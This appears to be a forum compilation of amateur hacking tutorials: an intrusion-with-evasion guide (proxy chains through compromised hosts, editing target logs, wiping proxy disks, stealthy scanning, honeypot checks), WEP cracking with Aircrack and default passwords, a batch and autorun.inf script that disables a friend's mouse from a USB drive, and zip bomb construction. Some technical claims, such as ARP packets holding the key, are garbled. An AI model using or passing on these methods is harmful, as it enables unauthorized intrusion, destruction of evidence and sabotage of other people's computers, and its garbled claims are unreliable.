
[How To Hack]


I keep seeing the n00bs ask "How to hack" -- The folks who've been into this scene for awhile get tired of these questions. So what's a n00b to do?

Well I'm here to help.
While this short tut will not give you a step-by-step, hold-your-hand solution ( such a solution is impossible for reasons you'll find out in this text. ) This text will give you a serious guideline to developing your own techniques and methodologies for hacking.

Next I must tell you the following: With penalties for hacking going up and up all over the world, in every nation (almost) doing a sloppy hack can get you from 20 years to LIFE IMPRISONMENT. The ball game has changed since I first got into it. Security is harder and tighter, penalties are going sky high. I'm reminded of the bad-old-days of the '60's in the USA when posession of a marijuana *seed* could get you life in prison. Those days have changed for you tokers, but the 'bad old days' are right now for hackers. It's easier than ever to get caught and you'll seriously screw up your life if you do get caught.

Tell me -- is doing that DDOS or crashing some SOB who 'wronged' you or publishing those warez to be leet -- is that worth the prison time? How much reward or inducement would someone have to give you before you'd agree to rob a bank at gunpoint and risk 20 years to life in jail? Don't laugh, The penalties for armed robbery of a federal depository such as a bank and hacking your neighbor's PC are the same - 20 to life!!! 

The only difference is that you stand a better chance of a reduced sentence for robbing a bank. Therefore I do not advocate you doing any exploits until and unless you really know what you are doing and are willing to take total responsibility for your actions. Bottom line -- do whatever the heck you want -- I'll not really change your mind because you won't/don't believe me and you 'know better' than I. I'll just leave you with this -- I've been hacking for 30 years now and I've never been caught nor charged - because I'm careful - I would never do any exploit without a proper investigation of the target - it's suicide.

So now I'll give you an outline of the do's and don't's as well as a little advice... Doing a real exploit involves much, much more than finding a vulnerable system and running a script to root it. Before you even consider using an exploit you must do the following MINIMUM:

1) Ensure that you are as hidden as possible, Chain of proxies; hidden cutouts; work thru a rhost or shell on a previously rooted machine; spoofed the hell out of everything; and last but definately not least -- NEVER EVER UNDER ANY CIRCUMSTANCES RUN AN EXPLOIT FROM YOUR HOME, SCHOOL OR OFFICE. In fact never run one from an inet cafe for obvious reasons. This is because you can and will be traced if your hack is noticed. This is because, no matter what you do, no matter how well you try to hide, in order to enter and snoop around in someone's PC you *must* establish a connection from you to them. Even if you work through a chain of proxies you can be traced. Those machines have logs, the machines they connect to have logs and so on and so on. which brings us to point 2.....

2)Clean up after yourself. This involves some very delicate surgery on the target. You should try to remove any log entries that pertain to you out of ALL logs. This is almost impossible without root access to the target. So if you got in, but didn't get root -- you could be screwed big time. Don't just erase the logs, that's way to crass. Edit the logs to remove your entries. Very time consuming, but very much worth it. Next clean up is your proxies/cut-outs, etc. Well you probably don't have root access on each machine in your chain of proxies. this is a problem because anyone who finds the first link of a back trace to one of the proxies will track you. If you can you must break the chain by destroying one or more of the proxies. This is not easy in and of itself as it involves compromising the proxy and wiping the HDD. However, even doing this you're not totally in the clear as recovery of the HDD may be possible or logs may be kept on external devices/media for that proxy. So even if you do crash it -- you're still screwed (potentially). Now to the 3rd point, how to find a suitable target...

3) Find a vulnerable system by UNOBTRUSIVE scanning techniques. Most of the regular scanners use very blatant scanning techniques that would wake the dead. They do this because they're made for security admins to test their networks, not for hackers to be sneaky. To scan a target use a scanner that allows very fine grain control of the scanning techniques and has several different techniques. Scanners like Xscan, GFI LanGuard and the like are totally unsuited for hacking. Be sure you really know HOW to use the scanner, all it's options and how it works. Select the most delicate of scans first and go from there after analyzing the results. You may want to do several types of scans, I know I do. 4th point -- Watch your back...

4) Get a GOOD packet sniffer. Use it to see if you're being backtraced. Set it up to watch for incomming packets not only from the target, but from at least his whole class-C subnet. In fact to be really safe, you may want to watch his class-B instead. I set my sniffer tolook at ALL incomming packets and filter to a seperate point the ones from the target and then all other incomming. I also set it to alert on any 'suspicious' packets that are common to a backtrace. In this fashion I can see if a backtrace has hit me from anywhere. If your sniffer doesn't have all these bells and whistles then do as I did and write your own. Now we start to get into the meat of hacking...

5)Education. You could be considered an idiot if you attempt a live exploit without knowing the following: 
5-A) TCP/IP: how it works; packet layout; OSI model; everything. How do expect to interpret a sniffer to see if you've been backtraced if you can't read a TCP/IP packet? 
5-B] Programming: You need to be able to compile the exploit yourself; you may need to do some surgery once in the target. 
5-C) Assembly Language: Since most exploits rely on shell code you must know assembly to be able to handle and fix any exploits; Assembly allows you fine-grain control of the target. If you are in a chroot jail a small assembly program can bust you out and potentially give you root. 
5-D) Be an EXPERT on the target's OS: How can you be expected to do all the things needed to perform a successful exploit if you can't do simple OS functions once you get in? 
5-E) Be an EXPERT with all the tools you use. Know them inside out, understand how they work and what they do. Next item....

6) UNOBTRUSIVELY sniff AROUND the target. Look at machines potentially on the same subnet that may be monitoring the target extenally. Also examine for any firewall, routers or other network infrastructure that could potentially aid or hinder your exploit. Sniff the target for signs of an IDS (intrusion detection system). Insure the potential target is not a honeypot. Failure to examine the machines/network AROUND the target is a deadly sin. More n00bs get caught by honeypots and IDS's because they fail to take the time to properly investigate their target. investigation must not be limited to the target and its immediate surroundings either.....

7) Examine whois and other relevant records to determine the owners of the target. You might undercover a very well placed law-enforcement honeypot this way. LE *sometimes* doesn't set up their domains and such well ahead of time and so you might uncover a trail to point to the *real* owner or a lack of trail indicating you should be cautious. Additionally examining the whole 'paper trail' may lead you to other networks the target is affiliated with. Some of those may have an easier way in and a route to a backdoor on your original target. Mandmins feel a false sense of security behind their own firewalls and leave open access between various subnets inside. This is a weapon to exploit whenever possible. However without proper safety procedures you can be nailed very easily as you may be logged from many different directions behind the firewall.

8)Hardware...What do you need? My recommendation is to get the smallest, lightest, tiniest laptop avalable. Sony had a tiny one that ran Win/ME, JVC has a couple small ones that they just released recently. Also you'll need various cords: phone, ethernet, USB, etc. You'll also need a phone cord for your modem that terminates in tiny alligator clips. This is to use a junction box directly to get phone service in a quiet place. The PC should have the following ports: ethernet, wireless, bluetooth, 56kb modem and USB. The idea is that everything fits into oversized coat pockets or a ditty bag under your coat. Right now carrying a tiny computer is still not a crime ( like burglar tools), but give the feds a chance. Carry a computer - go to jail.

9) Software ...What do you need? My recommendation is Linux with a hand-picked assortment of tools: scanners, sniffers, assembler, compilers and reference data on HDD. I won't go into much detail as the choice of tools is a very personal thing. Over the last 10 years or so I've been unhappy with the readily available tools and have used the available source of several to create my own versions. As you progress and are more concerned with doing an 'invisible' hack and not being noticed, you'll undoubtedly do the same. I also hesitate to recommend any of the readily bavailable tools just because of my dissatisfaction with them. While some are quite good, many do not lend themselves to stealth techniques. And last....

10) Ethics...Ah DAMN! The old fart is getting on his soapbox again. Well perhaps, but you'd do well to at least read what I have to say and *consider* my words. After all I've done more exploits than most of you put together and I still have my freedom. I must be doing something right.

10-A ) Don't do the crime if you can't do the time. By this I mean for you to understand that if you attempt an exploit against a machine that you do not have rights to -- you are breaking the law. Be a man (or woman) and be prepared to accept your punishment. Nobody told you to go out and hack, in fact I tell you not to do it. Most of you are just not capable of the attention to detail, nor do most of you posess the requisite knowledge at this time. Yes, there are exceptions to what I'm saying, however I'm writing this for n00bs, not the experienced/educated.

10-B ) The benefit of your actions must outweigh the risk. -- By this I mean to take a good, hard look at REALITY. What is the punishment if you get caught? Is it worth getting caught and suffering the punishment for what I get out of doing the deed? If you're stealing millions of dollars online -- well 20 to life is about the standard risk for grand theft. But if you're just screwing with your buddy...is that worth getting caught and convicted of a felony? Remember if you are a convicted felon - no guns - no voting - no *many* things.

10-C ) Knowledge is Power and Information is Wealth. If I have to explain this one - you're pretty dense.

10-D ) TANSTAAFL -- This is an anagram -- There Ain't No Such Thing As A Free Lunch. This basically means that you don't get something for nothing. The hacker's version of Newton's law of conservation of energy. If that target seems too good to be true - it's probably a trap. Watch you back, examine everyone's motives. You're wandering into the hacker community, keep your wits about you, not everyone nor everything is what it seems. After you've done all this then it MIGHT be safe to run that exploit. But it might not -- there are other checks that I go through, but I'm sure you get the idea. If all this seems like too much trouble and there must be an easier way -- you're right. Just log on from home, crank up xscan and find a vulnerable PC and perform that exploit. But have some snacks and drinks ready, sooner or later you'll get some visitors.

1.what flavor of linux do you prefer for the tasks you presented us in your article ? There are LOTS and LOTS of linux distro's. Though, they all work the same, so the one you use to preform the task is up to you. Some distro's are easy to setup and use (like mandrake, www.mandrake.org), others are really customisable and/or faster but they are a lot harder to install (like gentoo, www.gentoo.org). Personally I prefer gentoo. Though, for the real experts, to have FULL control on your computer, LFS (LinuxFromScratch, www.linuxfromscratch.org) is probably best. As you may have noticed, almost every distro's have www.theirname.org as website. though some sites will link to the real sites (like mandrake). One exception is redhat, which is .com. So just try www.thedistroname.org or if it doesnt exist www.thedistroname.com. Otherwise try google. 
2. the proggys for the newbies. is very important to start playing with the tools of the trade, and as easy as it seems for the people here that knows how to hack it would be nice to post at least the names of the prefered software a hakcer must use, so we the nbies can google it, or even better post (again) the link. Like Daremo said specifically, you should NEVER use a tool before you have enough knowledge. I don't have enough knowledge to use tools but I do. This highly increases my chances on getting caught. And like Daremo said, if you really want to hack you should program your own tools. Then you exactly know how they work and you can make it as obsecure as possible. Most of these tools wont be released, so there are only few. An example of a tool which can do a bit unobtrusive scanning is nmap (dont know the website), but still its not unobtrusive enough. And, why the hell would you want to port scan if you do not have enough knowledge to know what to do after the portscan? 
3.when are you gonna write a tutorial for C the way you did for assemble? There are lots of tutorials for C. And good ones, too. Just look around here (ebooks, programming) and read them. And he isnt done yet with the assembler one.... is he? 
4. now how you delete your tracks? where are the logs in the operating systems? Most targets for a hacker a linux boxes. Linux is -- unlike windows -- customisable. You can set the places of the logs yourself. I think even windows can do it. Though most of the times the logs will be in /var/log/. In windows I don't remember where they are. I believe somewhere like "%WINDOWSDIR%/system32/logfiles/" or "%WINDOWSDIR%/system/logfiles/" or so. Im not sure. But again, I think this can, even in windows, be changed


[How To Hack A Wireless Server] - For education only...

Wireless networks are great. They have removed what seemed like miles of unnecessary cables from our lives. Unfortunately, they work so well that most people eventually forget their network key. That is OK until you get a new computer and find yourself being asked for the key. What do you do when you've forgotten it? One solution is to reset the router, but that doesn't always work. Sometimes, you just have to hack your own system to gain access to what is rightfully yours.
.Difficulty: Moderate

.1 Instructions

Locate the wireless network that you want to connect to. The information on the network should identify the type of hardware used, such as the brand of the router. You can normally get this information by right-clicking on the name of the network and selecting "Network Properties." Make note of this information. If you do not have a way of detecting wireless networks to get the information, use software programs such as Kismet and Netstumbler (see Resources).

Attempt to access the system using default login information. The most common login information is "admin/admin" or "admin/password" for the username and password combination. As silly as that may sound, people actually use these combinations. If these do not work, try using the default login information that the manufacturer programmed into the hardware. There is a link in the Resources section to a list of these default logins. Should these not give you access to the network, continue to the next step.

Obtain a copy of the Aircracks software package. This software consists of four different utilities. Together, these four utilities are all that you'll need to hack into any wireless network.

Use Airodump to collect data packets that the network sends out. If you had obtained a copy of Kismet software in Step 1, this program will also collect packets for you. The network will sometimes use the same IV (Initialization Vector) more than once, known as a collision, so by analyzing several thousand packets, you can identify what these repeated vectors are.

Continue collecting data packets from the wireless network. The system will periodically send out what is known as an Address Resolution Protocol (ARP) in one of these packets. This is essentially a check to see if the connection is still online. It contains the encryption key that is needed to gain access to the system. However, you will need to collect a large number of data packets before you are lucky enough to capture this one.

Open the Aircrack utility and use it to scan the data packets that you have captured. The Aircrack utility will scan these files until it finds the ARP packet with the encryption key. It will then work with the Airdecap program to decrypt the contents of the packet and gain access to the wireless network.
.Download Network MonitorOpManager.ManageEngine.com
Manage LAN, WAN, Bandwidth, VoIP used by over 8000 admins. Try now!

Complete SNMP MonitoringWhatsUpGold.com/SNMP_Monitoring
Full SNMP v1-3 monitoring with WhatsUp Gold. Try it free!

Learn Real Hacking Skillswww.HackerDegree.com
Major in Network Security UAT: Masters, Bachelors, Associates

[Free] Network Snifferwww.Paessler.com/network-sniffer
Network Sniffer - Free software. Analyze network traffic. Download!

(** WarningsAlthough these steps will also work to hack into another person's wireless network, such an action is a criminal offense and should never be done under any circumstances..References***)



[How to enable GodMode on Windows 7]

Have you ever wondered if there are any secret Windows 7 features? Most games have a godmode, something that will enable all cheats and features. Windows 7 too. This is going to be a brief tutorial that will allow you to enable the secret godmode in Windows 7.

To enable windows 7 god mod Create a new folder (right-click and click on “New Folder”). Right-click on the folder and click on rename, copy and paste this:


Posted Image
Posted Image


[How to disable mouse]

I am going to show you how to disable your friend’s mouse whenever your USB drive is inserted.

To get this feature working, you must make sure that your friend has not disabled autorun for removable media. However you

may get this to work by creating a fake icon for the batch program.

First we’ll create a batch file and then we’ll be creating autorun.inf file. Then we’ll be pasting it in the root of USB

drive. Now whenever the USB drive is inserted, system will look for autorun.inf. Autorun.inf will execute that batch file

disabling the mouse.

@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4

Copy the above code in notepad and save it as “filename.bat”

The above code will disable the mouse by deleteing the registry key of Mouclass and again adds data = 0×00000004 to the

valuename = “Start”

Action=Mouse Disable

The above code goes for autorun.inf. Open notepad, copy and paste the above code in it and save it as “autorun.inf”.

Now copy both of the file in youre or youre friend’s USB drive. Then let it do the magic.

To re-enable the mouse you’ll just have to change the value 0×00000004 to 0×00000001. To do so, simply create another batch

file with following script:

@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 1


[How to make ZIP Bomb-ZIP of Death]

NOTE:This ZIP Bomb is detected by almost every Antivirus program so you can use it on systems witch dont have AV program...

A zip bomb, also known as a Zip of Death, is a malicious archive file designed to crash or render useless the program or system reading it. It is often used by virus writers to disable antivirus software, so that a more traditional virus sent afterwards could get into system undetected. A zip bomb is usually a small file (up to a few hundred kilobytes) for ease of transport and to avoid suspicion. However, when the file is unpacked its contents are more than the system can handle.You can make your own zip bomb to annoy your friends or just out of curiosity (or wilderness) to experiment with it. Make sure you don't detonate it on yourself.

Here is how to make your own Zip of Death

Create a new text file in notepad, name it a.txt

Open and type the null character (alt + 255) in it.

Now press Ctrl + A then Ctrl + V a couple times to make some null bytes.If u have a hex editor,then make the hex 00 for about 50 kilobytes.

Now make several copies of a.txt in the same directory and name them accordingly.

Open Command prompt and navigate to the folder containing a.txt . Type:

copy /b *.txt b.txt

This will write all the contents of a.text and its copies into a new text file called b.txt,hence making every copy is a super copy. Repeat the above steps from the beginning again and again to make a really big text file.

Once u have a nice empty big text file like 1gb or more,then compress it using Winrar or Winzip into a zip file.

You will find that it will be compressed to very small size (about 1MB ). It is because of the simple construction of the file as the text file contains 1gb of null bytes.

For added fun,open the compressed zip file file into a hex editor. You will see a bunch of hex 5555.Just add some more and the file will expand amazingly.

Make sure that YOU DONT OPEN THIS afterwards.
